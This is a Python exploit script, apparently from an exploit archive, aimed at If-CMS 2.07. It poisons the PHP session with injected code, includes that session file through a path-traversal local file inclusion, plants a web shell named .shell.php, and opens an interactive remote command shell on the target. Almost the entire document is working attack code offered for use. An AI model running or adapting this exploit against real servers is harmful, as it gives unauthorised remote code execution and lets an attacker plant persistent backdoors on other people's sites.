/exploits/php/webapps/16980.py
Python | 153 lines | 134 code | 9 blank | 10 comment | 8 complexity | fdab277db2b4da36eeed3cff976fc2ad MD5 | raw file
Possible License(s): GPL-2.0
- #!/usr/bin/python
- # ~INFORMATION
- # Exploit Title: If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit
- # Author: TecR0c
- # Date: 13/3/2011
- # Software link: http://bit.ly/hh9ZB4
- # Tested on: Linux bt
- # Version: 2.07
- # PHP.ini Settings: gpc_magic_quotes = Off
-
- import random,time,sys,urllib,urllib2,re,httplib,socket,base64,os,getpass
- from optparse import OptionParser
- from urlparse import urlparse,urljoin
- from urllib import urlopen
- from cookielib import CookieJar
-
- __CONTACT__ ="TecR0c(tecr0c@tecninja.net)"
- __DATE__ ="13.3.2011"
-
- usage = 'Example : %s http://localhost/ncms/ -p 127.0.0.1:8080' % __file__
- parser = OptionParser(usage=usage)
- parser.add_option("-p","--proxy", type="string",action="store", dest="proxy",
- help="HTTP Proxy <server>:<port>")
-
- (options, args) = parser.parse_args()
-
- if options.proxy:
- print '[+] Using Proxy'+options.proxy
-
- # User Agents
- agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
- "Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",
- "Google Chrome 0.2.149.29 (Windows XP)",
- "Opera 9.25 (Windows Vista)",
- "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
- "Opera/8.00 (Windows NT 5.1; U; en)"]
- agent = random.choice(agents)
-
- traversal = '../../../../../../../../../../../..'
- sessionLocation = '/var/lib/php5/'
-
- def banner():
- if os.name == "posix":
- os.system("clear")
- else:
- os.system("cls")
- header = '''
- |----------------------------------------|
- |Exploit: If-CMS 2.07 LFI RCE
- |Author: %s
- |Date: %s
- |----------------------------------------|\n
- '''%(__CONTACT__,__DATE__)
- for i in header:
- print "\b%s"%i,
- sys.stdout.flush()
- time.sleep(0.005)
-
- def injectPayload():
- webSiteUrl = url.geturl()+'index.php?newlang=<?php;system(base64_decode($_REQUEST[cmd]));?>'
- try:
- opener.open(webSiteUrl)
- except:
- print '[-] Failed'
-
- def proxyCheck():
- if options.proxy:
- try:
- h2 = httplib.HTTPConnection(options.proxy)
- h2.connect()
- print "[+] Using Proxy Server:",options.proxy
- except(socket.timeout):
- print "[-] Proxy Timed Out\n"
- pass
- sys.exit(1)
- except(NameError):
- print "[-] Proxy Not Given\n"
- pass
- sys.exit(1)
- except:
- print "[-] Proxy Failed\n"
- pass
- sys.exit(1)
-
- def getProxy():
- try:
- proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
- except(socket.timeout):
- print "\n[-] Proxy Timed Out"
- sys.exit(1)
- return proxy_handler
-
- cj = CookieJar()
- if options.proxy:
- opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
- else:
- opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
- opener.addheaders = [('User-agent', agent)]
-
- def postRequestWebShell(encodedCommand):
- webSiteUrl = url.geturl()+'.shell.php'
- commandToExecute = [
- ('cmd',encodedCommand)]
- cmdData = urllib.urlencode(commandToExecute)
- try:
- response = opener.open(webSiteUrl, cmdData).read()
- except:
- print '[-] Failed'
- sys.exit()
- return response
-
- def writeOutShell(encodedCommand):
- cookieString = str(cj)
- cookieSearch = re.compile(r"PHPSESSID=(.*) f")
- session_value = cookieSearch.search(cookieString)
- if session_value:
- session_value = session_value.group(1)
- cj.clear()
- webSiteUrl = url.geturl()+'index.php?cmd='+encodedCommand+'&newlang='+traversal+sessionLocation+'sess_'+session_value+'%00'
- try:
- opener.open(webSiteUrl)
- except:
- print '[-] Failed'
- sys.exit()
-
- def commandLine():
- encodedCommand = "echo '<?php system(base64_decode($_REQUEST[cmd]));?>' > .shell.php"
- encodedCommand = base64.b64encode(encodedCommand)
- writeOutShell(encodedCommand)
- commandLine = ('[RSHELL] %s@%s# ') % (getpass.getuser(),url.netloc)
- while True:
- try:
- command = raw_input(commandLine)
- encodedCommand = base64.b64encode(command)
- response = postRequestWebShell(encodedCommand)
- print response
- except KeyboardInterrupt:
- encodedCommand = base64.b64encode('rm .shell.php')
- postRequestWebShell(encodedCommand)
- print "\n[!] Removed .shell.php\n"
- sys.exit()
-
- if "__main__" == __name__:
- banner()
- try:
- url=urlparse(args[0])
- except:
- parser.print_help()
- sys.exit()
- getProxy()
- proxyCheck()
- injectPayload()
- commandLine()